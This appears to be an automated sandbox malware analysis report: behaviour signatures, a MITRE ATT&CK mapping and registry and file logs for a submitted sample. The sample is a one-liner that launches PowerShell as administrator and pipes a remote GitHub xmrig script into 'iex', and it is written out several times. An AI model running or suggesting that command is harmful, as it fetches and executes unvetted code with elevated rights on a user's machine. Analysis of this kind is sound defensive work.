Malware Analysis Report

2024-09-11 05:39

Sample ID 240630-ds7kaatalf
Target http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
Tags
cobaltstrike backdoor bootkit defense_evasion discovery evasion execution exploit persistence privilege_escalation spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex was found to be: Known bad.

Malicious Activity Summary

cobaltstrike backdoor bootkit defense_evasion discovery evasion execution exploit persistence privilege_escalation spyware stealer trojan

Cobaltstrike

Cobalt Strike reflective loader

Checks for common network interception software

Downloads MZ/PE file

Stops running service(s)

Command and Scripting Interpreter: PowerShell

Contacts a large (531) amount of remote hosts

Drops file in Drivers directory

Manipulates Digital Signatures

Creates new service(s)

Modifies Windows Firewall

Possible privilege escalation attempt

Loads dropped DLL

Event Triggered Execution: Component Object Model Hijacking

Reads user/profile data of web browsers

Executes dropped EXE

Checks BIOS information in registry

Modifies file permissions

Checks computer location settings

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Writes to the Master Boot Record (MBR)

Checks whether UAC is enabled

Modifies powershell logging option

Checks installed software on the system

Enumerates connected drives

Drops file in System32 directory

Checks system information in the registry

AutoIT Executable

Drops file in Program Files directory

Launches sc.exe

Drops file in Windows directory

Enumerates physical storage devices

Access Token Manipulation: Create Process with Token

Program crash

Event Triggered Execution: Netsh Helper DLL

NSIS installer

Suspicious use of SetWindowsHookEx

Uses Volume Shadow Copy service COM API

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SendNotifyMessage

Script User-Agent

Suspicious behavior: AddClipboardFormatListener

Suspicious use of AdjustPrivilegeToken

Modifies system certificate store

Checks processor information in registry

Runs net.exe

Modifies data under HKEY_USERS

Uses Task Scheduler COM API

Checks SCSI registry key(s)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

NTFS ADS

Enumerates system info in registry

Modifies registry class

Suspicious behavior: LoadsDriver

Suspicious behavior: EnumeratesProcesses

Enumerates processes with tasklist

Kills process with taskkill

Uses Volume Shadow Copy WMI provider

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Command and Scripting Interpreter
T1059
PowerShell
T1059.001
System Services
T1569
Service Execution
T1569.002
Persistence
TA0003
Create or Modify System Process
T1543
Windows Service
T1543.003
Event Triggered Execution
T1546
Netsh Helper DLL
T1546.007
Component Object Model Hijacking
T1546.015
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Pre-OS Boot
T1542
Bootkit
T1542.003
Privilege Escalation
TA0004
Create or Modify System Process
T1543
Windows Service
T1543.003
Event Triggered Execution
T1546
Netsh Helper DLL
T1546.007
Component Object Model Hijacking
T1546.015
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Access Token Manipulation
T1134
Create Process with Token
T1134.002
Defense Evasion
TA0005
Subvert Trust Controls
T1553
SIP and Trust Provider Hijacking
T1553.003
Install Root Certificate
T1553.004
Impair Defenses
T1562
Disable or Modify System Firewall
T1562.004
File and Directory Permissions Modification
T1222
Modify Registry
T1112
Pre-OS Boot
T1542
Bootkit
T1542.003
Access Token Manipulation
T1134
Create Process with Token
T1134.002
Credential Access
TA0006
Unsecured Credentials
T1552
Credentials In Files
T1552.001
Discovery
TA0007
Software Discovery
T1518
Network Service Discovery
T1046
Query Registry
T1012
System Information Discovery
T1082
Peripheral Device Discovery
T1120
Process Discovery
T1057
Lateral Movement
TA0008
Collection
TA0009
Data from Local System
T1005
Exfiltration
TA0010
Command and Control
TA0011
Web Service
T1102
Impact
TA0040
Service Stop
T1489
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-30 03:17

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-30 03:17

Reported

2024-06-30 03:47

Platform

win10v2004-20240611-en

Max time kernel

1800s

Max time network

1802s

Command Line

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex

Signatures

Cobalt Strike reflective loader

Description Indicator Process Target
N/A N/A N/A N/A

Cobaltstrike

trojan backdoor cobaltstrike

Checks for common network interception software

evasion

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Contacts a large (531) amount of remote hosts

discovery

Creates new service(s)

persistence execution

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\drivers\rsElam.sys C:\Users\Admin\AppData\Local\Temp\7zS0779229A\UnifiedStub-installer.exe N/A
File opened for modification C:\Windows\system32\DRIVERS\SETE517.tmp C:\Program Files\Npcap\NPFInstall.exe N/A
File created C:\Windows\system32\DRIVERS\SETE517.tmp C:\Program Files\Npcap\NPFInstall.exe N/A
File opened for modification C:\Windows\system32\DRIVERS\npcap.sys C:\Program Files\Npcap\NPFInstall.exe N/A
File created C:\Windows\system32\drivers\rsCamFilter020502.sys C:\Users\Admin\AppData\Local\Temp\7zS0779229A\UnifiedStub-installer.exe N/A
File created C:\Windows\system32\drivers\rsKernelEngine.sys C:\Users\Admin\AppData\Local\Temp\7zS0779229A\UnifiedStub-installer.exe N/A
File created C:\Windows\system32\drivers\rsElam.sys C:\Users\Admin\AppData\Local\Temp\7zS0779229A\UnifiedStub-installer.exe N/A

Manipulates Digital Signatures

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Cleanup\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0}\$DLL = "WINTRUST.DLL" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.11\FuncName = "WVTAsn1SpcStatementTypeDecode" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$DLL = "WINTRUST.DLL" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Message\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43}\$Function = "SoftpubLoadMessage" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2221\FuncName = "WVTAsn1CatNameValueEncode" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{C689AABA-8E78-11D0-8C47-00C04FC295EE}\FuncName = "CryptSIPPutSignedDataMsg" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{9BA61D3F-E73A-11D0-8CD2-00C04FC295EE}\FuncName = "CryptSIPRemoveSignedDataMsg" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE}\$Function = "WintrustCertificateTrust" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Usages\1.3.6.1.5.5.7.3.1\$DLL = "WINTRUST.DLL" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.4.3\FuncName = "WVTAsn1SealingSignatureAttributeDecode" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{C689AABA-8E78-11D0-8C47-00C04FC295EE}\FuncName = "CryptSIPRemoveSignedDataMsg" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{7801EBD0-CF4B-11D0-851F-0060979387EA}\$DLL = "Cryptdlg.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\60EE3FC53D4BDFD1697AE5BEAE1CAB1C0F3AD4E3\Blob = 0f0000000100000020000000eec58131dc11cd7f512501b15fdbc6074c603b68ca91f7162d5a042054edb0cf03000000010000001400000060ee3fc53d4bdfd1697ae5beae1cab1c0f3ad4e32000000001000000c0060000308206bc308205a4a003020102021003f1b4e15f3a82f1149678b3d7d8475c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3132303431383132303030305a170d3237303431383132303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e672043412028534841322930820122300d06092a864886f70d01010105000382010f003082010a0282010100a753fa0fb2b513f164cf8480fcae8035d1b6d7c7a32cac1a2cacf184ac3a35123a9291ba57e4c4c9f32fa8483cb7d66edc9722ba517961af432f0db79bb44931ae44583ea4a196a7874f237ec36c652490553ea1ca237cc542e9c47a62459b7dde6374cb9e6325f8849a9aad454fae7d1fc813cb759bc9e1e18af80b0c98f4ca3ed045aa7a1ea558933634be2b2e2b315866b432109f9df052a1efe83ed376f2405adcfa6a3d1b4bad76b08c5cee36ba83ea30a84cdef10b2a584188ae0089ab03d11682202276eb5e54381262e1d27024dbed1f70d26409802de2b69dce1ff2bb21f36cdbd8b3197b8a509fefec360a5c9ab74ad308a03979fdddbf3d3a09250203010001a38203583082035430120603551d130101ff040830060101ff020100300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307f06082b0601050507010104733071302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304906082b06010505073002863d687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274486967684173737572616e63654556526f6f7443412e63727430818f0603551d1f0481873081843040a03ea03c863a687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274486967684173737572616e63654556526f6f7443412e63726c3040a03ea03c863a687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274486967684173737572616e63654556526f6f7443412e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0302308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e301d0603551d0e041604148fe87ef06d326a000523c770976a3a90ff6bead4301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d01010b0500038201010019334a0c813337dbad36c9e4c93abbb51b2e7aa2e2f44342179ebf4ea14de1b1dbe981dd9f01f2e488d5e9fe09fd21c1ec5d80d2f0d6c143c2fe772bdbf9d79133ce6cd5b2193be62ed6c9934f88408ecde1f57ef10fc6595672e8eb6a41bd1cd546d57c49ca663815c1bfe091707787dcc98d31c90c29a233ed8de287cd898d3f1bffd5e01a978b7cda6dfba8c6b23a666b7b01b3cdd8a634ec1201ab9558a5c45357a860e6e70212a0b92364a24dbb7c81256421becfee42184397bba53706af4dff26a54d614bec4641b865ceb8799e08960b818c8a3b8fc7998ca32a6e986d5e61c696b78ab9612d93b8eb0e0443d7f5fea6f062d4996aa5c1c1f0649480 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{64B9D180-8DA2-11CF-8736-00AA00A485EB}\$DLL = "WINTRUST.DLL" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Signature\{189A3842-3041-11D1-85E1-00C04FC295EE}\$DLL = "WINTRUST.DLL" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2010\Dll = "WINTRUST.DLL" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Usages\1.3.6.1.5.5.7.3.1\DefaultId = "{573E31F8-AABA-11D0-8CCB-00C04FC295EE}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Signature\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\$DLL = "WINTRUST.DLL" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\CertCheck\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0}\$DLL = "WINTRUST.DLL" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{DE351A43-8E59-11D0-8C47-00C04FC295EE}\FuncName = "CryptSIPVerifyIndirectData" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Initialization\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43}\$DLL = "WINTRUST.DLL" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Usages\1.3.6.1.5.5.7.3.2\CallbackFreeFunction = "SoftpubFreeDefUsageCallData" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Initialization\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\$DLL = "WINTRUST.DLL" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2000\Dll = "WINTRUST.DLL" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2010\FuncName = "WVTAsn1IntentToSealAttributeDecode" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$DLL = "WINTRUST.DLL" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Message\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$DLL = "WINTRUST.DLL" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Usages\1.3.6.1.5.5.7.3.1\CallbackAllocFunction = "SoftpubLoadDefUsageCallData" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\$Function = "DriverFinalPolicy" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Usages\2.16.840.1.113730.4.1\$DLL = "WINTRUST.DLL" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$Function = "HTTPSFinalProv" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.4.3\Dll = "WINTRUST.DLL" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{7801EBD0-CF4B-11D0-851F-0060979387EA}\$Function = "WintrustCertificateTrust" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2222\FuncName = "WVTAsn1CatMemberInfoDecode" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{DE351A43-8E59-11D0-8C47-00C04FC295EE}\Dll = "WINTRUST.DLL" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Usages\1.3.6.1.5.5.7.3.3\DefaultId = "{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43}\$Function = "WintrustCertificateTrust" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.4.2\Dll = "WINTRUST.DLL" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Signature\{189A3842-3041-11D1-85E1-00C04FC295EE}\$DLL = "WINTRUST.DLL" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}\FuncName = "CryptSIPRemoveSignedDataMsg" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllFormatObject\1.3.6.1.5.5.7.3.4\Dll = "cryptdlg.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\CertCheck\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$Function = "SoftpubCheckCert" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Usages\1.3.6.1.4.1.311.10.3.3\CallbackAllocFunction = "SoftpubLoadDefUsageCallData" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\CertCheck\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$Function = "SoftpubCheckCert" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Usages\2.16.840.1.113730.4.1\CallbackAllocFunction = "SoftpubLoadDefUsageCallData" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2221\Dll = "WINTRUST.DLL" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\CertCheck\{189A3842-3041-11D1-85E1-00C04FC295EE}\$Function = "SoftpubCheckCert" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{C689AABA-8E78-11D0-8C47-00C04FC295EE}\Dll = "WINTRUST.DLL" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{C689AABA-8E78-11D0-8C47-00C04FC295EE}\Dll = "WINTRUST.DLL" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{DE351A43-8E59-11D0-8C47-00C04FC295EE}\Dll = "WINTRUST.DLL" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2006\FuncName = "WVTAsn1SpcStatementTypeEncode" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.20\FuncName = "WVTAsn1SpcLinkDecode" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE}\$Function = "SoftpubAuthenticode" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2007\Dll = "WINTRUST.DLL" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{7801EBD0-CF4B-11D0-851F-0060979387EA}\$DLL = "WINTRUST.DLL" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Message\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0}\$DLL = "WINTRUST.DLL" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.15\Dll = "WINTRUST.DLL" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2003\FuncName = "WVTAsn1SpcIndirectDataContentEncode" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.15\FuncName = "WVTAsn1SpcPeImageDataDecode" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2001\Dll = "WINTRUST.DLL" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.27\Dll = "WINTRUST.DLL" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Message\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0}\$Function = "SoftpubLoadMessage" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Initialization\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43}\$DLL = "WINTRUST.DLL" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$DLL = "WINTRUST.DLL" C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SYSTEM32\netsh.exe N/A
N/A N/A C:\Windows\SYSTEM32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SYSTEM32\netsh.exe N/A
N/A N/A C:\Windows\SYSTEM32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A

Stops running service(s)

evasion execution

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-LFFGT.tmp\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Program Files\McAfee\WebAdvisor\UIHost.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation F:\BlueStacks X\BlueStacksWeb.exe N/A
